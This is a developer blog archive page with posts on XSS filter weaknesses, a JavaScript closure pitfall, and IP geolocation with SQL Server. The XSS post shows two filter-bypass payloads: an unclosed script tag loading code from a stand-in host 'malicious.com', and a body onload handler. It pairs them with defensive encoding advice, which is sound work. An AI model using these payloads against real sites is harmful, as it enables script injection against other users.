
Monthly Archives: September 2007

Check your XSS filters (Cross-site scripting)

In the last couple of days I’ve tested the effectiveness of XSS filters in two different commercial forum applications, both advertised as being able to filter out malicious scripts. Neither was effectively protected against this:

<script src="http://malicious.com/script.js"

Agh! All I did was remove the tag’s closing “>” character and neither app recognised it as HTML. The latest versions of Firefox and Internet Explorer both “gracefully” interpret the malformed tag, loading and running the malicious script.

If I didn’t want to load my JS from an external file (to help hide my identity), or if they were specifically preventing the string “<script”, I could have written this:

<body onload="alert('I am evil script'); doEvilStuff();"

Browsers don’t care if you add multiple body tags. They’ll run the “onload” code for all of them.

One of the applications was supposed to filter out all HTML, full stop. Putting images in this supposed plain text was, of course, easy – just miss off the closing bracket of the <IMG> tag.

Rolling your own HTML filter

HTML filtering is hard to get right, because HTML is so permissive. Even the big webmail services occasionally admit that someone’s found a new loophole in their system.

If you can get away with simply HTML-encoding *all* user input at the point of display, do that – it’s easy and very safe, like this:

MyLabel.Text = HttpUtility.HtmlEncode(suspiciousString);
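The same encode-everything idea takes only a few lines if you need it client-side in Javascript. This is just a sketch with a made-up helper name, not a substitute for a well-tested library:

```javascript
// Hypothetical helper: escape the five characters that matter in HTML.
function htmlEncode(s) {
    return String(s)
        .replace(/&/g, '&amp;')   // must run first, or later entities get double-encoded
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');
}
```

Once encoded, even a deliberately malformed tag like the one above comes out as harmless visible text rather than markup.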

If you have a functional requirement to allow certain HTML tags, you’re going to have to consider the multitude of ways that someone can hide script in HTML.

If you’re writing .NET to parse and reformulate possibly-malformed HTML, I strongly recommend the HTML Agility Pack. It’s a Microsoft-hosted open source project that makes it a breeze to extract plain text – or whitelisted markup – from any string claiming to be HTML.

Don’t rely on some regular expression you cooked up yourself in 10 minutes. You won’t get it right.

When is a Javascript closure not really a closure?

This has frustrated me one time too many, so I’ve finally taken the time to figure it out. What should the following code do?

var closures = [];
for(var i = 0; i < 10; i++)
	closures[i] = function() { alert(i); }
closures[3]();

It alerts "3", right? Wrong. It alerts "10". It turns out that the Javascript runtime will only open one closure context per function call. So, the anonymous functions in the array all reference the same closure context, and so they're all seeing the same variable i in whatever state it's reached when they're finally invoked.

This can be a pain. Really, sometimes I want closures to wrap up the complete state of execution at the instant they're defined, particularly when defining event handlers in a loop.
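To see why this bites with event handlers, here’s a DOM-free sketch of the same pitfall (the buttons array is just a stand-in for real DOM elements):

```javascript
// Simulating "event handlers defined in a loop" without a DOM.
// Every handler closes over the SAME variable i, not a copy of it.
var buttons = [{}, {}, {}];
for (var i = 0; i < buttons.length; i++) {
    buttons[i].onclick = function() { return i; };
}
// By the time any handler actually runs, the loop has finished and i is 3:
buttons[0].onclick();  // 3, not 0
buttons[2].onclick();  // 3
```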

You can work around it with code like this:

var closures = [];
for(var i = 0; i < 10; i++)
	closures[i] = (function(i) {
		return function() { alert(i); }
	})(i);
closures[3]();

Ta da! Now it alerts "3". All we're doing is creating a 'wrapper' anonymous function from which the real one gets returned. The act of invoking the wrapper function creates a new closure context.

Note: this isn't a bug in Javascript - it's intended behaviour. Learn more about Javascript closures.

Geolocation is easier (and cheaper) than you think

Most of the time when you’re surfing the web, or creating web applications, you don’t expect real geography to be involved. Historically it’s been tricky to identify with any accuracy or reliability the physical location of your visitors, and might even be said to contravene the spirit of the web. But what if you really do want to take action based on where they’re coming from?

I discovered today that it’s really easy. Geolocation is the term used for the conversion of an IP address to a real-world geographic location. For example:

216.239.59.103 maps to:

City: Mountain View, California, USA
Latitude: 37.3956
Longitude: -122.076

There are a whole bunch of companies selling geolocation services – usually either as web services, or as downloadable databases containing IP addresses and geographic data.

Free geolocation data

If you’re looking for something free, check out MaxMind GeoLite City. You can download a huge pair of CSV files (one for IP blocks, one for corresponding location data) from their website and import them into SQL Server, and you’ll end up with a schema like this:

[Schema diagram: a Blocks table (BlockStart, BlockEnd, LocationID) joined to a Locations table (LocationID, City, Region, Country, Latitude, Longitude)]

Now, there are 4 billion possible IP addresses, so rather than explicitly listing every one as a separate row (which really would hurt SQL Server) the MaxMind people have split up the IP address space into blocks which correspond to a single geographic location. To help SQL Server find which block an IP address is in, they have defined a one-to-one mapping from IP addresses to BIGINT values, as such:

A.B.C.D <=> A*256^3 + B*256^2 + C*256 + D
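That mapping is one line of arithmetic in any language. Here’s a Javascript sketch (ipToNumber is a name I’ve invented) you could use to compute the lookup value before querying:

```javascript
// Hypothetical helper: map "A.B.C.D" to A*256^3 + B*256^2 + C*256 + D.
function ipToNumber(ip) {
    var parts = String(ip).split('.');
    if (parts.length !== 4) throw new Error('Not a dotted-quad address: ' + ip);
    var n = 0;
    for (var i = 0; i < 4; i++) {
        var octet = parseInt(parts[i], 10);
        if (isNaN(octet) || octet < 0 || octet > 255)
            throw new Error('Bad octet: ' + parts[i]);
        n = n * 256 + octet;
    }
    return n;
}
```

For example, ipToNumber('216.239.59.103') returns 3639556967 - the number you’d compare against BlockStart and BlockEnd.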

 

So now you can (almost) instantly obtain geographic data for any IP address by defining a SQL user-defined function (UDF) such as:

CREATE FUNCTION [GetGeocodingData]
    (@a tinyint, @b tinyint, @c tinyint, @d tinyint)
RETURNS @ReturnTable TABLE (
	City VARCHAR(255),
	Region VARCHAR(255),
	Country VARCHAR(255),
	Latitude FLOAT,
	Longitude FLOAT
)
AS
BEGIN
	INSERT @ReturnTable
	SELECT 	lo.City,
		lo.Region,
		lo.Country,
		lo.Latitude,
		lo.Longitude
	FROM Blocks bl
	JOIN Locations lo on lo.LocationID = bl.LocationID
	WHERE (CAST(@a AS BIGINT)*256*256*256 + @b*256*256 + @c*256 + @d)
	  BETWEEN bl.[BlockStart] AND bl.[BlockEnd]

	RETURN
END
GO

In this example, the parameters @a, @b, @c, @d correspond to the four parts of the IP address (and should therefore be integers in the range 0-255).
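Splitting the dotted-quad string into those four parameters is worth doing carefully, since a malformed address should be rejected rather than geocoded. A quick Javascript sketch (ipToOctets is my own name for it):

```javascript
// Split "A.B.C.D" into the four 0-255 integers the UDF expects as @a..@d.
function ipToOctets(ip) {
    var parts = String(ip).split('.');
    if (parts.length !== 4) throw new Error('Not a dotted-quad address: ' + ip);
    return parts.map(function(p) {
        var octet = parseInt(p, 10);
        if (isNaN(octet) || octet < 0 || octet > 255)
            throw new Error('Bad octet: ' + p);
        return octet;
    });
}
```

You’d then hand the four values to the UDF with something like SELECT * FROM dbo.GetGeocodingData(216, 239, 59, 103).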